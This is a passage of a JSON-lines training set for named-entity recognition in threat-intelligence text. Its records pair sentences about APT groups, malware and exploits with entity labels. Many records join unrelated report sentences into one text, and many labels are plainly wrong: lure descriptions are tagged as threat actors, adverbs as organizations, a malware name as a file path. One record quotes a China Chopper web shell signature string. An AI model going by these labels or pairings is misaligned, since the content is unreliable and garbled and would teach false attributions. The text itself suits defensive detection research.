At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"ORGANIZATION: Advanced Threat Research": [[287, 311]], "TOOL: Proxysvc": [[332, 340]], "MALWARE: DarkComet": [[547, 556]], "FILEPATH: menu\\programs\\startup\\smss.exe": [[627, 657]], "MALWARE: CloudLook": [[706, 715]]}, "info": {"id": "cyberner_stix_train_007466", "source": "cyberner_stix_train"}} {"text": "DHS and FBI are distributing these IP S-PROT addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "TOOL: IP S-PROT addresses": [[35, 54]]}, "info": {"id": "cyberner_stix_train_007467", "source": "cyberner_stix_train"}} {"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . 
Normally the call flow graph ( CFG ) The generic campaigns are aimed at various civilian targets in Poland and Ukraine , such as with Excel spreadsheet lures masquerading as value - added tax ( VAT ) return forms .", "spans": {"ORGANIZATION: Symantec": [[122, 130]], "THREAT_ACTOR: group": [[203, 208]], "THREAT_ACTOR: Excel spreadsheet lures masquerading": [[452, 488]], "THREAT_ACTOR: value - added tax ( VAT ) return forms": [[492, 530]]}, "info": {"id": "cyberner_stix_train_007468", "source": "cyberner_stix_train"}} {"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"MALWARE: Honeycomb": [[4, 13]], "MALWARE: decoy documents": [[237, 252]], "TOOL: InPage": [[265, 271]], "VULNERABILITY: exploits": [[272, 280]], "ORGANIZATION: politically": [[323, 334]], "ORGANIZATION: militarily": [[338, 348]]}, "info": {"id": "cyberner_stix_train_007469", "source": "cyberner_stix_train"}} {"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"MALWARE: SWAnalytics": [[25, 36]], "THREAT_ACTOR: Patchwork": [[118, 127]], "FILEPATH: RTF files": [[154, 163]], "VULNERABILITY: CVE-2017-8570": [[175, 188]]}, "info": {"id": "cyberner_stix_train_007470", "source": "cyberner_stix_train"}} {"text": "CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . 
All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[0, 24]], "THREAT_ACTOR: PINCHY SPIDER": [[47, 60]], "TOOL: GandCrab ransomware": [[82, 101]], "TOOL: C&C": [[418, 421]]}, "info": {"id": "cyberner_stix_train_007471", "source": "cyberner_stix_train"}} {"text": "The same is likely to be the case for com.pugna.magiccall but this is unknown currently . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": {"THREAT_ACTOR: APT41": [[104, 109]], "TOOL: TeamViewer": [[115, 125]], "ORGANIZATION: healthcare": [[167, 177]], "ORGANIZATION: company": [[178, 185]], "MALWARE: PinchDuke samples": [[231, 248]], "THREAT_ACTOR: Dukes group": [[291, 302]], "ORGANIZATION: Ministry of Defense": [[355, 374]], "ORGANIZATION: ministries of foreign affairs": [[394, 423]]}, "info": {"id": "cyberner_stix_train_007472", "source": "cyberner_stix_train"}} {"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices . In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples . 
Currently , APT12 continues to target organizations and conduct cyber operations using its new tools . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"SYSTEM: WhatsApp": [[19, 27]], "TOOL: backdoor": [[328, 336]], "TOOL: KeyBoy": [[435, 441]], "THREAT_ACTOR: APT12": [[504, 509]], "ORGANIZATION: @SecurityAura": [[631, 644]]}, "info": {"id": "cyberner_stix_train_007473", "source": "cyberner_stix_train"}} {"text": "While the Dukes employed both hacked websites and purposely rented servers for their C&C infrastructure , the group rarely registered their own domain names , preferring instead to connect to their self- operated servers via IP addresses .", "spans": {"THREAT_ACTOR: Dukes": [[10, 15]], "TOOL: C&C": [[85, 88]]}, "info": {"id": "cyberner_stix_train_007474", "source": "cyberner_stix_train"}} {"text": "ViperRAT : The Mobile APT Targeting The Israeli Defense Force That Should Be On Your Radar February 16 , 2017 ViperRAT is an active , advanced persistent threat ( APT ) that sophisticated threat actors are actively using to target and spy on the Israeli Defense Force.The threat actors behind the ViperRAT surveillanceware collect a significant amount of sensitive information off of the device , and seem most interested in exfiltrating images and audio content . In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months . ZxShell.dll is injected in a shared SVCHOST process . 
If an IOC is malicious and the file available to us , Symantec Endpoint products will detect and block that file .", "spans": {"MALWARE: ViperRAT": [[0, 8], [110, 118], [297, 305]], "ORGANIZATION: Israeli Defense Force": [[40, 61]], "ORGANIZATION: Israeli Defense Force.The": [[246, 271]], "FILEPATH: ZxShell.dll": [[571, 582]], "TOOL: SVCHOST": [[607, 614]], "TOOL: Symantec Endpoint products": [[679, 705]]}, "info": {"id": "cyberner_stix_train_007475", "source": "cyberner_stix_train"}} {"text": "In 2014 , our colleagues at Crowdstrike wrote an exposé about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": {"ORGANIZATION: Crowdstrike": [[28, 39]], "THREAT_ACTOR: APT threat group": [[86, 102]], "THREAT_ACTOR: Putter Panda": [[119, 131]], "ORGANIZATION: Mandiant": [[140, 148]], "ORGANIZATION: FireEye": [[151, 158]], "THREAT_ACTOR: APT2": [[172, 176]], "FILEPATH: BalkanRAT malware": [[200, 217]]}, "info": {"id": "cyberner_stix_train_007477", "source": "cyberner_stix_train"}} {"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . 
For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: MSP networks": [[104, 116]], "ORGANIZATION: customers": [[138, 147]], "MALWARE: TRITON": [[228, 234]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[285, 318]]}, "info": {"id": "cyberner_stix_train_007478", "source": "cyberner_stix_train"}} {"text": "Domain Registration IP address Registration date", "spans": {}, "info": {"id": "cyberner_stix_train_007479", "source": "cyberner_stix_train"}} {"text": "This runs code in the onCreate ( ) method of the app ’ s MainActivity class , which in effect is the program ’ s entry point . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian government .", "spans": {"THREAT_ACTOR: APT41": [[153, 158]], "ORGANIZATION: Hong Kong media": [[189, 204]], "THREAT_ACTOR: APT28": [[412, 417]], "ORGANIZATION: Russian government": [[425, 443]]}, "info": {"id": "cyberner_stix_train_007480", "source": "cyberner_stix_train"}} {"text": "We believe PinchDuke ’s credential stealing functionality is based on the source code of the Pinch credential stealing malware ( also known as LdPinch ) that was developed in the early 2000s and has later been openly distributed on underground forums .", "spans": {"MALWARE: PinchDuke": [[11, 20]], "TOOL: Pinch": [[93, 98]], "MALWARE: LdPinch": [[143, 150]]}, "info": {"id": "cyberner_stix_train_007481", "source": "cyberner_stix_train"}} {"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware . 
Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"SYSTEM: Google Play": [[61, 72]], "MALWARE: Ashas adware": [[112, 124]], "MALWARE: Ploutus-D": [[127, 136]], "THREAT_ACTOR: attackers": [[153, 162]], "TOOL: Flash": [[458, 463]], "VULNERABILITY: CVE-2015-8651": [[466, 479]], "VULNERABILITY: CVE-2016-1019": [[482, 495]], "VULNERABILITY: CVE-2016-4117": [[502, 515]]}, "info": {"id": "cyberner_stix_train_007482", "source": "cyberner_stix_train"}} {"text": "Subsequent Cobalt Strike C2 servers included subdomains of svchosts . com , svrchost . com , and strust . club .", "spans": {"TOOL: Cobalt Strike": [[11, 24]], "TOOL: C2": [[25, 27]]}, "info": {"id": "cyberner_stix_train_007483", "source": "cyberner_stix_train"}} {"text": "The Patchwork group continues to plague victims located within the Indian subcontinent . 
In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": {"THREAT_ACTOR: Patchwork group": [[4, 19]], "THREAT_ACTOR: Mofang": [[130, 136]], "ORGANIZATION: government": [[199, 209]], "ORGANIZATION: military": [[212, 220]], "ORGANIZATION: critical infrastructure": [[223, 246]], "ORGANIZATION: automotive": [[255, 265]], "ORGANIZATION: weapon industries": [[270, 287]]}, "info": {"id": "cyberner_stix_train_007484", "source": "cyberner_stix_train"}} {"text": "China Chopper web shell files named error404.aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": {"TOOL: Chopper": [[6, 13]], "FILEPATH: error404.aspx": [[36, 49]]}, "info": {"id": "cyberner_stix_train_007485", "source": "cyberner_stix_train"}} {"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . KeyLog Capture or record the remote computer ’s keystrokes . 
The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious .", "spans": {"ORGANIZATION: Deepen": [[100, 106]], "THREAT_ACTOR: APT6": [[109, 113]], "TOOL: PDF": [[169, 172]], "TOOL: ZIP": [[177, 180]], "MALWARE: SCR file": [[257, 265]]}, "info": {"id": "cyberner_stix_train_007486", "source": "cyberner_stix_train"}} {"text": "In the samples we analyzed we found the port and C&C information encrypted and hardcoded into the Nidiran malware itself .", "spans": {"TOOL: C&C": [[49, 52]], "MALWARE: Nidiran": [[98, 105]]}, "info": {"id": "cyberner_stix_train_007487", "source": "cyberner_stix_train"}} {"text": "These resulted in a loader version that would later become known as the “ Nemesis Gemina loader ” due to PDB strings found in many of the samples .", "spans": {"MALWARE: Nemesis Gemina loader": [[74, 95]], "TOOL: PDB": [[105, 108]]}, "info": {"id": "cyberner_stix_train_007488", "source": "cyberner_stix_train"}} {"text": "After the installation of the trojan , it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called \" GoogleCC . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . 
Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: ITG08’s": [[231, 238]], "MALWARE: More_eggs backdoor": [[394, 412]], "THREAT_ACTOR: APT37": [[467, 472]]}, "info": {"id": "cyberner_stix_train_007489", "source": "cyberner_stix_train"}} {"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry . Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 . Bundles of Data in the Wrong Place \"", "spans": {"ORGANIZATION: energy sector": [[275, 288]], "FILEPATH: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1": [[391, 455]]}, "info": {"id": "cyberner_stix_train_007490", "source": "cyberner_stix_train"}} {"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64 APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . 
The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": {"MALWARE: TrickMo": [[257, 264]], "THREAT_ACTOR: APT38": [[364, 369]], "ORGANIZATION: financial institutions": [[491, 513]], "ORGANIZATION: companies": [[660, 669]], "ORGANIZATION: video game and software development industry": [[689, 733]]}, "info": {"id": "cyberner_stix_train_007491", "source": "cyberner_stix_train"}} {"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"TOOL: Word": [[32, 36]], "VULNERABILITY: CVE-2015-2545": [[147, 160]], "THREAT_ACTOR: attacker": [[194, 202]], "FILEPATH: Catchamas": [[276, 285]], "MALWARE: Trojan": [[298, 304]]}, "info": {"id": "cyberner_stix_train_007492", "source": "cyberner_stix_train"}} {"text": "FakeSpy uses this view to redirect users to the original post office carrier webpage on launch of the application , continuing the deception . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . 
Gorgon Group used common URL shortening services to download payloads .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT34": [[218, 223]], "TOOL: PowerShell": [[241, 251]], "THREAT_ACTOR: Gorgon Group": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007494", "source": "cyberner_stix_train"}} {"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]], "ORGANIZATION: communications": [[315, 329]], "ORGANIZATION: geospatial imaging": [[332, 350]], "ORGANIZATION: defense sectors": [[357, 372]]}, "info": {"id": "cyberner_stix_train_007495", "source": "cyberner_stix_train"}} {"text": "This activity spiked in July 2015 , when the group dropped two completely new exploits , an Office and Java zero-day .", "spans": {"TOOL: Office": [[92, 98]], "TOOL: Java": [[103, 107]], "VULNERABILITY: zero-day": [[108, 116]]}, "info": {"id": "cyberner_stix_train_007496", "source": "cyberner_stix_train"}} {"text": "Actors will often not use exploits due to the fact that researchers can find and eventually patch these which renders the actors weaponized platforms defunct .", "spans": {}, "info": {"id": "cyberner_stix_train_007497", "source": "cyberner_stix_train"}} {"text": "After that it ’ s necessary to send “ stop_blocker ” to the same number – this will disable the display of HTML pages that extort money and block the screen . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . 
The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": {"MALWARE: Careto": [[218, 224]], "THREAT_ACTOR: cyber espionage actors": [[349, 371]], "THREAT_ACTOR: TEMP.Periscope": [[408, 422]]}, "info": {"id": "cyberner_stix_train_007498", "source": "cyberner_stix_train"}} {"text": "Given the connection between WERDLOD and OSX_DOK.C , it is reasonable to assume that the latter is also a part of the Operational Emmental campaign .", "spans": {"MALWARE: WERDLOD": [[29, 36]], "MALWARE: OSX_DOK.C": [[41, 50]]}, "info": {"id": "cyberner_stix_train_007499", "source": "cyberner_stix_train"}} {"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat . The OilRig group continues to remain a highly active adversary in the Middle East region . The final payload is a remote access tool ( RAT ) written in python . 
Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"SYSTEM: FireEye Mobile Threat Prevention": [[14, 46]], "MALWARE: RuMMS": [[127, 132]], "THREAT_ACTOR: OilRig group": [[189, 201]], "TOOL: remote access tool": [[299, 317]], "TOOL: RAT": [[320, 323]], "TOOL: python": [[337, 343]], "TOOL: Foxit PDF reader": [[364, 380]], "TOOL: Foxit PDF Reader": [[420, 436]], "TOOL: Adobe Acrobat": [[526, 539]]}, "info": {"id": "cyberner_stix_train_007500", "source": "cyberner_stix_train"}} {"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"THREAT_ACTOR: MSS": [[116, 119]], "ORGANIZATION: Trend Micro": [[376, 387]], "FILEPATH: espionage toolkit": [[437, 454]], "MALWARE: KeyBoy": [[535, 541]]}, "info": {"id": "cyberner_stix_train_007501", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS MD5 : 45b0e5a457222455384713905f886bd4 .", "spans": {"FILEPATH: 45b0e5a457222455384713905f886bd4": [[19, 51]]}, "info": {"id": "cyberner_stix_train_007502", "source": "cyberner_stix_train"}} {"text": "This domain was registered on December 20 , 2017 and within a few days was resolving to 92.222.136.105 , which belonged to a well-known VPS provider often used by the Sofacy group .", "spans": {"IP_ADDRESS: 92.222.136.105": [[88, 102]], "TOOL: VPS": [[136, 139]], "THREAT_ACTOR: Sofacy": [[167, 173]]}, "info": {"id": 
"cyberner_stix_train_007503", "source": "cyberner_stix_train"}} {"text": "Figure 13 : placeholder classes in Boot module Technical Analysis – Patch Module When “ Agent Smith ” has reached its goal – a malicious payload running inside the original application , with hooks on various methods – at this point , everything lies with maintaining the required code in case of an update for the original application . The attackers began taking them offline in January 2014 . The loader DLL E-TOOL replaces the contents of these processes with the first and second decrypted executables . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"MALWARE: Agent Smith": [[88, 99]], "TOOL: The loader": [[396, 406]], "TOOL: DLL E-TOOL": [[407, 417]], "THREAT_ACTOR: ransomware gangs": [[573, 589]]}, "info": {"id": "cyberner_stix_train_007504", "source": "cyberner_stix_train"}} {"text": "This also provides a perfect pivot point to hunt for samples .", "spans": {"TOOL: pivot point": [[29, 40]]}, "info": {"id": "cyberner_stix_train_007505", "source": "cyberner_stix_train"}} {"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list . The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 . 
It decodes the binary and writes it to a Java temporary directory with name “ ntuser.bin ” .", "spans": {"ORGANIZATION: embassy": [[340, 347]]}, "info": {"id": "cyberner_stix_train_007506", "source": "cyberner_stix_train"}} {"text": "DATA GATHERING Getting a list of all installed applications : Once EventBot is installed on the target machine , it lists all the applications on the target machine and sends them to the C2 . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": {"MALWARE: EventBot": [[67, 75]], "MALWARE: Okrum malware": [[224, 237]], "MALWARE: backdoors": [[330, 339]], "THREAT_ACTOR: APT32": [[369, 374]], "TOOL: emails": [[404, 410]], "FILEPATH: Microsoft ActiveMime file": [[416, 441]]}, "info": {"id": "cyberner_stix_train_007507", "source": "cyberner_stix_train"}} {"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . 
TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {"ORGANIZATION: Symantec": [[16, 24]], "THREAT_ACTOR: TEMP.Veles": [[190, 200]], "MALWARE: custom": [[211, 217]], "MALWARE: malware": [[218, 225]], "MALWARE: tailormade credential gathering tools": [[240, 277]]}, "info": {"id": "cyberner_stix_train_007508", "source": "cyberner_stix_train"}} {"text": "We however do not believe so .", "spans": {}, "info": {"id": "cyberner_stix_train_007509", "source": "cyberner_stix_train"}} {"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . w[redacted].livehost.live : 443 . w[redacted].dnslookup.services : 443 . where the redacted part corresponds to the name of the targeted university . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: Poison Ivy": [[253, 263]], "ORGANIZATION: Trend Micro": [[328, 339]], "URL: w[redacted].livehost.live": [[375, 400]], "URL: w[redacted].dnslookup.services": [[409, 439]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[565, 612]]}, "info": {"id": "cyberner_stix_train_007510", "source": "cyberner_stix_train"}} {"text": "Not long after this variant was public , newer variants of HenBox were seen , and some had significant increases in the number of targeted apps . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . 
The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": {"MALWARE: HenBox": [[59, 65]], "THREAT_ACTOR: APT41": [[146, 151]], "TOOL: CROSSWALK.BIN": [[161, 174]], "MALWARE: Komplex Trojan": [[248, 262]], "THREAT_ACTOR: Sofacy": [[292, 298]], "MALWARE: Carberp": [[302, 309]], "MALWARE: Trojan": [[318, 324]], "SYSTEM: Windows": [[394, 401]], "TOOL: C2": [[434, 436]]}, "info": {"id": "cyberner_stix_train_007511", "source": "cyberner_stix_train"}} {"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms . They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . 
While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]], "ORGANIZATION: technology": [[632, 642]], "ORGANIZATION: Symantec": [[695, 703]], "ORGANIZATION: pharmaceutical firms": [[772, 792]], "ORGANIZATION: MS": [[886, 888]], "TOOL: Office": [[889, 895]], "MALWARE: FakeSG": [[940, 946]], "MALWARE: SocGholish": [[1117, 1127]]}, "info": {"id": "cyberner_stix_train_007512", "source": "cyberner_stix_train"}} {"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis . This campaign shows us that network-based detection is important but must be completed by system behaviour analysis . KillMilk : Self - Proclaimed Founder of KillNet", "spans": {"THREAT_ACTOR: OilRig group": [[300, 312]], "ORGANIZATION: governmental agencies": [[436, 457]], "ORGANIZATION: businesses": [[462, 472]], "THREAT_ACTOR: KillMilk": [[620, 628]]}, "info": {"id": "cyberner_stix_train_007513", "source": "cyberner_stix_train"}} {"text": "Cybereason 's investigation shows that the threat actor behind the FakeSpy campaign is a Chinese-speaking group dubbed \" Roaming Mantis '' , a group that has led similar campaigns . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . 
The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "MALWARE: FakeSpy": [[67, 74]], "ORGANIZATION: Roaming Mantis": [[121, 135]], "THREAT_ACTOR: \bMagic Hound": [[182, 194]], "ORGANIZATION: energy": [[239, 245]], "ORGANIZATION: government": [[248, 258]], "ORGANIZATION: technology": [[265, 275]], "THREAT_ACTOR: Gamaredon Group": [[355, 370]], "ORGANIZATION: dynamic DNS providers": [[416, 437]], "ORGANIZATION: hosting providers": [[518, 535]], "MALWARE: custom-built": [[556, 568]], "MALWARE: malware": [[569, 576]]}, "info": {"id": "cyberner_stix_train_007514", "source": "cyberner_stix_train"}} {"text": "Decompiled APK resources . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"MALWARE: Word document": [[300, 313]], "FILEPATH: manual.doc": [[314, 324]], "THREAT_ACTOR: Honeybee": [[394, 402]]}, "info": {"id": "cyberner_stix_train_007515", "source": "cyberner_stix_train"}} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . 
The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "FILEPATH: .exe file": [[149, 158]], "FILEPATH: Microsoft Word file": [[186, 205]]}, "info": {"id": "cyberner_stix_train_007516", "source": "cyberner_stix_train"}} {"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": {"SYSTEM: Android": [[95, 102]], "THREAT_ACTOR: Bemstour": [[130, 138]], "VULNERABILITY: vulnerabilities": [[160, 175]], "THREAT_ACTOR: BRONZE BUTLER": [[249, 262]]}, "info": {"id": "cyberner_stix_train_007517", "source": "cyberner_stix_train"}} {"text": "It can also be sold on the dark web and used in various spoofing attacks . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[106, 130]], "THREAT_ACTOR: OilRig group": [[180, 192]], "ORGANIZATION: governmental agencies": [[316, 337]], "ORGANIZATION: businesses": [[342, 352]]}, "info": {"id": "cyberner_stix_train_007518", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "VULNERABILITY: exploit": [[297, 304]], "TOOL: Flash": [[311, 316]], "VULNERABILITY: CVE-2015-5119": [[333, 346]]}, "info": {"id": "cyberner_stix_train_007519", "source": "cyberner_stix_train"}} {"text": "The OnionDuke toolset includes various modules for purposes such as password stealing , information gathering , denial of service ( DoS ) attacks , and even posting spam to the Russian social media network , VKontakte .", "spans": {"MALWARE: OnionDuke": [[4, 13]], "TOOL: denial of service": [[112, 129]], "TOOL: DoS": [[132, 135]], "TOOL: VKontakte": [[208, 217]]}, "info": {"id": "cyberner_stix_train_007520", "source": "cyberner_stix_train"}} {"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"ORGANIZATION: WikiLeaks": [[74, 83]], "ORGANIZATION: DNS provider": [[87, 99]], "MALWARE: Perl IRC bot": [[281, 